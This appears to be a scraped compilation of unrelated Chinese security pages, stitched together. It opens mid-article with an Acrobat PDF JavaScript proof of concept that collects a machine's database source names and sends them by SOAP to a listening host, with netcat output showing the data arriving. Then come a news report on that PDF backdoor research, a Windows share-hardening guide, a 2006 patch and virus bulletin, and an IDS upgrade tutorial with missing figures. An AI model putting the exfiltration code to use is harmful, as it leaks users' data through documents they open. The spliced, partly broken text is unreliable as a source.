var cURL = "http://localhost/";

var cTestString = ""; 

var databaseList = ADBC.getDataSourceList();

var DB = "";

if (databaseList != null) {

for (var i=0; i DB+=databaseList[i].name;

}

cTestString = DB;

var response = SOAP.request( {

cURL: cURL,

oRequest: {

"http://myxmlns/:echoString": {

inputString: cTestString

}

},

cAction: " http://additional-opt/"

});

var result = response["http://no-need/:echoStringResponse"]["return"];

On the server side we get this:

$ ./nc.exe -l -p 80 -v

listening on [any] 80 …

connect to [127.0.0.1] from localhost [127.0.0.1] 1924

POST / HTTP/1.1 

Accept: */*

Content-Type: text/xml; charset=UTF-8

SOAPAction: "http://additional-opt/"

Content-Length: 578

User-Agent: Mozilla/3.0 (compatible; Acrobat SOAP 7.0)

Host: localhost

Connection: Keep-Alive 

Cache-Control: no-cache

<?xml version="1.0″?>

<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" 

xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" 

xmlns:xsi="http://www.w3.org/2001/

XMLSchema-instance"><SOAP-ENV:Body><ns0:echoString SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/so 

ap/encoding/" xmlns:ns0="http://myxmlns/"><inputString xsi:type="xsd:string">

MS Access 97 DatabaseFoxPro FilesText FilesMS Access DatabaseExcel FilesdBASE Files

dbase1</inputString>

</ns0:echoString> 

</SOAP-ENV:Body>

</SOAP-ENV:Envelope>

Kierznowski指出，在PDF文件中至少还有其他7个漏洞可被攻击者用于执行恶意代码。注意到Adobe Acrobat支持"HTML表单"和"文件系统访问"的使用，他说"如果再进一步发挥创造力，更简单的和/或更高级的攻击可以被放在一起。"Kierznowski在其blog上说他还有一些其他有趣的发现，其中之一是你可以通过将一个后门Javascript文件读入一个本地路径后在所有Adobe Acrobat文件中加入后门。
    Kierznowski说他在PDF文件中审查后门的好奇心来对于关于"被动攻击"概念的着迷。 他在提到内部用户对周围的网络通常表示信任时说："诸如缓存溢出这样的主动攻击技术已经越来越难被发现和利用……未来的安全攻击的希望在于Web技术。" 微软Office应用程序（Word，Excel，Powerpoint）被用于瞬时攻击的趋势得以证实后，Kierznowski看到了客户方攻击的未来在于挖掘服务的功能。 他说："这种形式的攻击只是有效利用用户信任的圈子操纵其客户端完成一个特定的功能。"
    Adobe产品安全事件相应小组的一名发言人说，公司已经得知Kierznowski的发现并正在"积极调查"这一问题。 位于加州圣何塞总部的公司在发往eWEEK的声明中说："如果Adobe证实我们的某个产品将受到安全攻击的影响，这一安全攻击的细节及适当的解决方案将被编档发布。"

彻底封杀Windows系统的共享漏洞

从Windows98开始，共享就给很多的上网用户带来无穷无尽的烦恼，但同时共享又是黑客攻击他人的电脑的一把利器。如何彻底禁止Windows 2000和Windows XP系统的共享漏洞呢？下面我们来说一说相关的知识。
　　1、查看共享资源
　　在Windows XP系统中，电脑所有的驱动器都默认为自动共享，但不会显示共享的手形标志，这就给网络安全留下了隐患。我们可以在“运行”栏中填入cmd进入命令提示符，输入net share，快速查看电脑中的共享资源，找到这些共享目录。
　　如果对“命令提示符”的界面不习惯，可以依次打开“控制面板→管理工具→计算机管理→共享文件夹”，查看电脑中所有的共享资源。
　　2、清除共享漏洞
　　首先确保以Administrator或Power Users组的成员身份登录系统，然后通过以下三个步骤清除共享的漏洞。
　　1).依次打开“开始菜单→控制面板→管理工具→服务”，找到“Server”服务，停止该服务，并且在“属性”中将“启动类型”设置为“手动”或“已禁用”。
　　2).修改注册表。依次打开“开始→运行”，输入regedit进入“注册表编辑器”，找到HEKY_LOCAL_MACHINESystem\CurrentControlSetServicesLanmanServerParamaters子键，在右侧的窗口中分别新建一个名为“AutoShareWks”和一个名为“AutoShareServer”的双字节键值，并且将值设置为“0”。
　　3).使用命令提示符下的“net share”命令也可以很好地消除这一隐患。打开Windows自带的记事本，输入如下内容:：
　　net share admin$ /del
    net share ipc$ /del
    net share c /del
    接下来将该文件保存为一个扩展名为“bat”的批处理文件。最后，运用Windows的“任务计划”功能让该批处理文件在每次开机时都自动运行。
　　提示:如果还有其他盘使用了共享，如D盘，则在记事本中添加“net share d /del”即可。输入时不要忽略参数之前的空格

病毒警报

本周时间里，微软公司发布了今年9月份的系统漏洞补丁程序。其中Windows操作系统的漏洞补丁程序有2个、办公文字处理软件Office的漏洞补丁程序有1个。国家计算机病毒应急处理中心建议广大计算机用户注意这3个漏洞补丁程序中的以下两个，它们分别是：
（一） MS06-052：Microsoft PGM远程缓冲区溢出漏洞，PGM是一个可靠且可伸缩的多播协议。Microsoft在处理PGM消息时存在缓冲区溢出漏洞，恶意攻击者可能利用此漏洞在服务器上执行任意恶意指令程序。恶意攻击者也可以发送特制的多播消息来触发这个漏洞，导致攻击者在计算机系统上执行恶意指令。
（二） MS06-053：Microsoft索引服务查询验证跨站脚本执行漏洞，Microsoft索引服务可以为文件系统和虚拟Web服务器创建内容和属性的索引目录。索引服务没有正确地验证查询参数，可能允许跨站恶意脚本程序执行。如果计算机用户受诱骗而访问了恶意网站，那么就可能会使恶意攻击者在计算机用户系统上运行客户端脚本程序，该脚本程序可能含有欺骗信息或是泄露信息。
本周发作：
病毒名称：“沙滩” （Worm_Satan）
病毒类型：蠕虫
发作日期：9月23日
危害程度：23日，蠕虫发作会自动关闭被感染的计算机系统，25日，蠕虫会不断打开系统中的“记事本”程序，直到耗尽系统资源导致系统死机。
专家提醒：
　　针对我们提到的上述提到的两个主意的漏洞补丁程序，根据以往的经验来看，这些漏洞补丁程序很可能会被恶意攻击者利用来进行病毒传播。用户不可以忽视它们，大家要根据自己的系统情况尽快地下载安装这个补丁程序，防止类似的利用系统漏洞进行恶意攻击现象的发生。

图 1

  图  2

    若如图2所示，本机就已具有主控权限。可以直接进行下一步操作。若是提示“当前没有管理主机设置为主控状态”，只需依次打开菜单：监控主机—> 设置主控状态。若当前主控状态已设置为其它管理机，需在原主控机上进行解除主控状态操作后。才能将本机更改为主控状态。
　　为什么需要主控状态？主控状态的作用是针对IDS设备多用户同时管理时，确保当前只有一个用户可以对其配置进行修改，避免出现因多用户同时修改规则，而对设备运行产生不可预计的问题。在多用户管理时，主控状态确保只有一台主机对IDS具有修改与配置的权限，而其它用户对IDS的信息查看与报表生成等操作不受影响，保障了IDS系统的正常运作。
　　第二步：系统升级
　　如图3所示，打开系统维护—> 系统升级菜单：

 
图  3

　第三步：下载最新升级包
　　如图4所示，点击系统升级窗口中的下载按键，将自动打开IE并登录东软网站，或直接访问东软URL地址http://neteye.neusoft.com

  图  4

    升级文件的具体下载地址在网站技术支持—> 升级包栏目下，如图5所示：

   图  5

    点击如图6所示页面中最新的Neteye IDS规则升级包，图中最新版本为8月18日的升级文件。最新的升级文件中包括了之前的升级文件，如果你有很长时间未更新，无需下载之前的升级文件。

   图  6

    为了确保升级文件的正确性，网站上提供了每个升级包的检验信息。用户可以通过对本地规则库文件进行验证。下图7所示为使用winMD5对下载到本地的2006-08-18141828.zip规则库文件进行检验比对。

  图  7

第四步：选取合适的升级文件进行升级
　　升级包中包含有三个文件：除了其中一个是说明文件外，另两个都为升级文件：
　　1、系统规则库升级包 NetEyeIDS_SysRuleLib_UpgradePackage_0220060818.nif
　　2、集中管理器规则库导入包 NetEyeIDS_SysRuleLib_CenterManager_0220060818.nif
　　单台的IDS设备升级请使用
    1、系统规则库升级包NetEyeIDS_SysRuleLib_UpgradePackage_0220060818.nif升级，集中管理器升级文件采用升级文件
    2、如不确认自己的系统是哪类，请与工程师联系了解自己系统是何种类型后再进行升级。

   图  8

    选择合适的最新升级文件后，会在系统升级窗口中的备注信息中显示这个升级包新更新的内容。请在升级时注意此处信息，后面我们还需要根据此处所显示的信息对IDS当前所使用策略进行编辑。

    图  9

    选择正确的升级文件点击确定后，系统会弹出两个窗口，并分别确认，如图10与图11：

   图  10

   图  11

第五步：修改当前应用策略
　　升级完成并重新连接监控主机后，升级操作还没有结束，还需要对当前应用的策略进行修改。选取所需的新事件。如图12至图15所示：

 图  12

   粗黑体的策略为当前正应用的策略，点击编辑：

  图  13

    在策略编辑器中，根据刚刚升级窗口中备注信息中所显示新增信息来进行查看与选取。08.18升级包中主要增加了[网络使用策略(85)]，这里我们就点击图中箭头所示位置。

  图  14

　    新增事件主要是关于Yahoo IM通讯软件的事件，这里我们根据内网实际需要进行选取。然后点击箭头所示位置保存修改的策略。

  图  15

    点击保存策略后，会弹出三个窗口，依次点击确认。

图 16  图 17   图 18

    升级成功后，IDS就能检测出更多的攻击事件，如下图19与图20所示，图19为Yahoo IM登录成功事件：

  图 19

    图20为P2P BitTorrent通告请求事件：

  图 20

                                                                                                   （工程师：姚智）